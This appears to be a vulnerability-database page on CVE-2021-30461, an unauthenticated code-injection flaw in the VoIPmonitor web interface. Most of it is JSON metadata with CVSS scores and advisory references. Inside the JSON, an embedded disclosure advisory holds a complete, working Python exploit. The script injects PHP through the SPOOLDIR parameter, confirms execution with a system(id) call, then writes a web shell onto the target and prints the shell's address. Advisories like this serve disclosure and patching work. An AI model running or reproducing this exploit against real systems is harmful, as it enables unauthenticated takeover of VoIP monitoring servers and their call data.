Description
### Impacted Products
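VoIPmonitor < 24.60 (note: the CVE-2021-30461 record and the SSD advisory in the related data below list 24.60 itself as affected — "before 24.61" and "version 24.60 and prior" — and name GUI release 24.61 as the fix, so treat any web GUI older than 24.61 as vulnerable)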
### How to RCE
...
Related
{"id": "2FC71FEA-D01A-505F-A34B-80EC65B2DE24", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for Code Injection in Voipmonitor", "description": "### Impacted Products\r\n\r\nVoIPmonitor < 24.60\r\n\r\n### How to RCE\r...", "published": "2021-07-14T19:20:11", "modified": "2022-01-30T02:59:48", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2021-30461"], "immutableFields": [], "lastseen": "2022-01-30T03:44:28", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0425"]}, {"type": "cve", "idList": ["CVE-2021-30461"]}, {"type": "githubexploit", "idList": ["4C29C6C8-3E9A-5617-80AD-E367D7C538B9", "8B5F5CC4-9345-5EC3-B507-5575BCD2D4F7"]}, {"type": "seebug", "idList": ["SSV:99239"]}], "rev": 4}, "score": {"value": 5.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0425"]}, {"type": "cve", "idList": 
["CVE-2021-30461"]}, {"type": "githubexploit", "idList": ["4C29C6C8-3E9A-5617-80AD-E367D7C538B9", "8B5F5CC4-9345-5EC3-B507-5575BCD2D4F7"]}, {"type": "kitploit", "idList": ["KITPLOIT:3449843613571411531"]}, {"type": "seebug", "idList": ["SSV:99239"]}, {"type": "threatpost", "idList": ["THREATPOST:99DC4B497599503D640FDFD9A2DC5FA3"]}]}, "exploitation": null, "vulnersScore": 5.9}, "_state": {"dependencies": 1646321174}, "privateArea": 1}
{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:32:08", "description": "A remote code execution vulnerability exists in VoIPmonitor. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-02T00:00:00", "type": "checkpoint_advisories", "title": "VoIPmonitor Remote Code Execution (CVE-2021-30461)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30461"], "modified": "2021-08-02T00:00:00", "id": "CPAI-2021-0425", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-10T15:20:40", "description": "# CVE-2021-30461\nVOIP RCE\n\nTechn...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": 
"NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-07T09:22:01", "type": "githubexploit", "title": "Exploit for Code Injection in Voipmonitor", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30461"], "modified": "2021-10-10T08:47:13", "id": "4C29C6C8-3E9A-5617-80AD-E367D7C538B9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-19T06:50:48", "description": "### Impacted Products\r\n\r\nVoIPmonitor < 24.60\r\n\r\n### How to RCE\r...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-11T04:09:04", "type": "githubexploit", "title": "Exploit for Code Injection in Voipmonitor", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30461"], "modified": "2022-05-19T06:07:23", "id": "8B5F5CC4-9345-5EC3-B507-5575BCD2D4F7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "cve": [{"lastseen": "2022-03-23T17:32:52", "description": "A remote code execution issue was discovered in the web UI of VoIPmonitor before 24.61. When the recheck option is used, the user-supplied SPOOLDIR value (which might contain PHP code) is injected into config/configuration.php.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-29T14:15:00", "type": "cve", "title": "CVE-2021-30461", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30461"], "modified": "2021-06-09T17:43:00", "cpe": [], "id": "CVE-2021-30461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30461", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "seebug": [{"lastseen": "2021-07-24T10:56:08", "description": "# SSD Advisory \u2013 VoIPmonitor UnAuth 
RCE\n\nMay 6, 2021 [SSD Disclosure / Technical Lead](https://ssd-disclosure.com/author/noamr/) [Uncategorized](https://ssd-disclosure.com/category/uncategorized/)\n\n**TL;DR**\n\nFind out how a vulnerability in VoIPmonitor allows an unauthenticated attacker to execute arbitrary code.\n\n**Vulnerability Summary**\n\nVoIPmonitor is \u201copen source network packet sniffer with commercial frontend for SIP RTP and RTCP VoIP protocols running on linux\u201d.\n\nUse of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor.\n\n**CVE**\n\nCVE-2021-30461\n\n***\\*Credit\\****\n\nAn independent security researcher, Furkan G\u00f6ksel, has reported this vulnerability to the SSD Secure Disclosure program.\n\n**Affected Versions**\n\nVoIPmonitor version 24.60 and prior\n\n**Vendor Response**\n\n\u201cA new GUI release 24.61 is fixing this security issue.\u201d\n\n**Vulnerability Analysis**\n\nDue to improper filtering of malicious function, attacker can able to run command via PHP application of VoIPMonitor\u2019s web UI.\n\nWhen POST request has been made to index.php file with `SPOOLDIR` and `recheck` parameters, the vulnerability can be triggered.\n\nThis is due to the fact that `SPOOLDIR` value gets introduced into the `config/configuration.php` file that is later called by the UI interface.\n\nThe `SPOOLDIR` value is placed \u201cas is\u201d in the PHP source code allowing remote attackers to insert arbitrary commands along with the intended value for this parameter.\n\n**Exploit**\n\n```python\nimport argparse\nfrom sys import argv,exit\nimport time\nimport random\nimport string\n\ntry:\n import requests\nexcept ImportError:\n print(\"pip3 install requests \")\n\nprint(\"\"\"\n###############################################\n# VOIP Monitor RCE #\n###############################################\n\"\"\")\n\nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; 
rv:86.0) Gecko/20100101 Firefox/86.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"Connection\": \"close\"}\n\n\ndef get_target(args):\n hostname = args.host\n path = args.path\n if path:\n return f\"http://{hostname}/{path}/index.php\"\n else:\n return f\"http://{hostname}/index.php\"\n\ndef set_tmp(args):\n global headers\n target = get_target(args)\n n_data = {\"SPOOLDIR\": \"/tmp\", \"recheck\": \"annen\"}\n set_totmp = requests.post(target, n_data, headers=headers)\n print(f\"[*] set /tmp {set_totmp}\")\n\n\ndef checkVulnerability(args):\n global headers\n target = get_target(args)\n print(f\"[+] Attacking {target}\")\n testcmd = {\"SPOOLDIR\": \"test\\\".system(id).\\\"\", \"recheck\": \"annen\"}\n response_text = b\"uid=\"\n testcmd_req = requests.post(target, testcmd, verify=False, headers=headers)\n if response_text in testcmd_req.content:\n print(\"[*] host is vulnerable\")\n else:\n print(\"[-] host is not vulnerable\")\n exit()\n\n\ndef uploadshell(args):\n global headers\n hostname = args.host\n path = args.path\n shell_path = \"\"\n shellfilename = str ( ''.join(random.choice(string.ascii_lowercase) for i in range(10)) )\n target = get_target(args)\n rce_payload = {\"SPOOLDIR\": f\"/tmp\\\".file_put_contents('{shellfilename}.php','<?php echo system($_GET[\\\"a\\\"]);').\\\"\", \"recheck\": \"annen\"}\n rce_req = requests.post(target, headers=headers, data=rce_payload)\n print(f\"[*] uploading shell {rce_req.status_code}\")\n if path:\n shell_path = f\"http://{hostname}/{path}/{shellfilename}.php\"\n else:\n shell_path = f\"http://{hostname}/{shellfilename}.php\"\n shell_check = requests.get(shell_path, headers=headers, params={'a':'id'})\n print(f\"[*] RCE Check : {shell_check.text}\")\n print(f\"[*] Your Shell at {shell_path}\")\n\n\ndef main():\n parser = argparse.ArgumentParser(description='VoIP Monitor all versions 
command execution')\n parser.add_argument('-t','--host',help='Host', type=str)\n parser.add_argument('-b', '--path',help='Path of the VoIP Monitor', type=str)\n args = parser.parse_args()\n set_tmp(args)\n checkVulnerability(args)\n set_tmp(args)\n uploadshell(args)\n set_tmp(args)\n\n\n\nif __name__ == \"__main__\":\n main()\n```", "published": "2021-05-08T00:00:00", "type": "seebug", "title": "VoIPMonitor\u672a\u6388\u6743\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2021-30461\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-30461"], "modified": "2021-05-08T00:00:00", "id": "SSV:99239", "href": "https://www.seebug.org/vuldb/ssvid-99239", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": ""}]}